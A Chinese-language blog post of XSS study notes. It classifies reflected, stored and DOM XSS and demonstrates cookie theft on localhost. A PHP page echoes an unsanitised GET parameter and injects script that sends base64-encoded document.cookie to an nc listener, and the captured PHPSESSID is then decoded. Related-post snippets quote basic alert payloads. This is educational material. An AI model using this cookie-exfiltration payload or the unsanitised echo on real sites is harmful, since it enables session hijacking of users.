XSS笔记

最新推荐文章于 2024-12-19 00:59:40 发布

caiqiiqi

最新推荐文章于 2024-12-19 00:59:40 发布

阅读量373

点赞数

分类专栏：网络编程 js

本文链接：https://blog.youkuaiyun.com/caiqiiqi/article/details/81140655

版权

网络编程同时被 2 个专栏收录

93 篇文章

订阅专栏

2 篇文章

订阅专栏

XSS分类

与服务端的处理请求的方式有关

反射型(响应只能反射到发起请求的人那里)
存储型(漏洞影响其他访问该网站服务的用户)

与服务端的处理请求的方式无关

DOM型（比如location.href.hash）

设置php服务端脚本

$ cat index.php                                         [3:06:29]
<?php
  session_start();
  echo $_GET['x']. "\n";
  echo '<script>location.href = "//127.0.0.1:2217/" + btoa(document.cookie)</script>"';
?>
#这里btoa()函数是js的base64加密的方法

用PHP开启默认web服务器

$ php -S 127.0.0.1:2215

用nc监听某端口作为一个TCP服务器接收HTTP请求

$ nc -k -l 2217 #-k表示持续监听

构造url访问2215的web服务

http://127.0.0.1:2215/?pwd=cqq

查看php的web访问日志

这里写图片描述

$ echo "UEhQU0VTU0lEPWRiYTVhZDg2OTFmZTkyNjZkZmMwYjlkYzIxMjg5ODU5"|base64 -D
PHPSESSID=dba5ad8691fe9266dfc0b9dc21289859%

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

caiqiiqi

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

xss game挑战笔记.pdf

02-11

### XSS Game挑战笔记知识点概述 #### 一、XSS攻击简介 XSS（Cross Site Scripting）即跨站脚本攻击，是一种常见的Web应用程序安全漏洞。攻击者通过在Web页面中注入恶意脚本代码，当用户浏览该页面时，嵌入其中的...

个人笔记-渗透测试-XSS漏洞

weixin_48162696的博客

05-22

678

XSS，反射型，存储型，XSS的检测和利用，XSS的防御方法

参与评论您还未登录，请先登录后发表或查看评论

xss 笔记

LAngle9的博客

03-24

627

1，xss ：因为和css 冲突，改名字是xss,属于客户端攻击，网站管理员也是用户，攻击者盗取管理员的cookie，靠管理员身份作为“跳板”进行实施攻击。 XSS攻击最终目的是在网页中嵌入客户端恶意脚本代码，最常用的攻击代码是javascript语言，但也会使用其它的脚本语言 j avascript语言：是跨平台的，在jsp,php,asp,aspx,都可以使用 xss 用的脚本是可以构造的，有两千多种方法，要记者常用的函数就行 script, alert, img src 1.2 XS.

xss笔记

h0ld1rs的博客

07-27

331

xss涉及知识js中三种弹窗的简单使用alert、confirm、promptHTML DOM 事件对象报错处理 js中三种弹窗的简单使用alert、confirm、prompt 1、alert():显示带有一条指定消息和一个 OK（确认）按钮的警告框。写在script标签中括号中的内容为字符串或者整型点击确认即可关闭，无返回值 2、confirm():用于显示一个带有指定消息和 OK 及取消按钮的对话框。一般作为判断条件写在script标签中括号中的内容为字符串和整型点击确认返回tru

XSS学习笔记

Likhaooo的博客

03-27

243

文章目录1. XSS的定义2. XSS的原理3. XSS的攻击方式4. XSS的防御措施5.xss闭合 1. XSS的定义跨站脚本攻击(Cross Site Scripting)，缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码，当用户浏览该页之时，嵌入其中Web里面的Script代码会被执行，从而达到恶意攻击用户的目的。 2. XSS的原理攻击者对含有漏洞的服务器发起XSS攻击（注入JS代码）。诱使受害者打开受到攻击的服务器URL。受害者在Web浏览器中打开URL，恶意脚本执行。 3

【CTF-Web】XSS漏洞学习笔记（附ctfshow web316-333题目）

最新发布

brhhh_sehe的博客

12-19

1011

用户在输入框中输入图片地址存储到str变量中然后在xss()函数里面给id为demo的标签设置内容（innerHTML）内容是加载图片，所以我们输入时放一个无法加载的图片，然后触发onerror事件，在这个事件里面可以触发弹窗，注意构造payload的时候一定要把img标签进行闭合。自己语言的转义：我认为就是在该网站中，比如说存在留言功能，然后攻击者留言了一段恶意代码，这段留言是别的用户也可以访问到的，在其他用户查看这段留言的时候服务器进行解析，导致执行一些危险行为，这个整段过程就是跨站脚本攻击。

xss(笔记)

weixin_45291045的博客

10-30

632

文章目录xss原理xss的危害xss分类如何测试xss xss原理 xss其实就是HTML代码注入，恶意攻击者往Web页面里插入恶意html代码，当用户浏览该页之时，嵌入其中Web里面的html代码会被执行，从而达到恶意用户的特殊目的。 xss的危害盗取cookie 网络钓鱼劫持用户会话网页挂马等等 xss分类反射型xss（非持久型）一般出现在搜索框，get传参里传参不会进入数据库，需要进行社工，诱骗管理员点击链接存储型xss（持久型）一般出现在，留言框，设置资料的框，各种跟数据库有

XSS攻击学习笔记

长源的博客

08-08

817

教程：http://edu.51cto.com/course/5733.html 进行XSS攻击时，常用的HTML标记：<script></script>、<iframe></iframe>、<img />

XSS笔记分享

weixin_65386473的博客

01-15

2669

XSS 漏洞介绍跨站脚本攻击(Cross Site Scripting)，恶意攻击者往Web页面里插入恶意Script代码，当用户浏览该页之时，嵌入其中Web里面的Script代码会被执行，从而达到恶意攻击用户的目的。 xss特点：能注入恶意的HTML/JavaScript代码到用户浏览器网址上，从而劫持会话 xss漏洞类型： 1.反射型 XSS 反射型XSS又称非持久性XSS，这种攻击往往具有一次性。攻击者通过邮件等形式将包含XSS代码的链接发送给正常用户，当用户点击时，服务器接...

XSS学习笔记（入门篇）

Chris Lee

01-16

1034

最近的学习速度挺快的，对于寒假的计划是对于各种知识点都了解大概并且基本懂得原理，在开学之后对相关书籍深入研究！这里我就先总结下几个XSS应用的例子吧。一.利用< >标记注射html / javascript 如果可以随心所欲引入< >标记，那么就可以通过script输入有javasript编写的恶意脚本代码。 eg：<script>alert("你...

XSS通关笔记

龙卷风摧毁停车场

10-09

656

这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题，有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能，丰富你的文章UML 图表FLowchart流程图导出与导入导出导入欢迎使用Markdown编辑器你好！这是你第一次使用 Markdown编辑器所展示的欢迎页。如果你想学习如何使用Mar

xss笔记总结

Long_gone的博客

10-21

217

普通注入 <script>alert(1)</script> 点击注入 "οnclick="alert(1) 创建链接 <a href="javascript:alert(1)">123</a> 点击创建输入框 <input onclick="alert(1)"> 插入图片 <img src="123" onerror="...

XSS Game挑战笔记：入门到精通

本文档是一份关于XSS Game挑战笔记的详细记录，旨在帮助读者深入理解跨站脚本攻击（Cross-Site Scripting, XSS）的概念和相关技术。作者开始时提到自己之前对XSS的理解较为初级，主要停留在基本的alert操作层面，...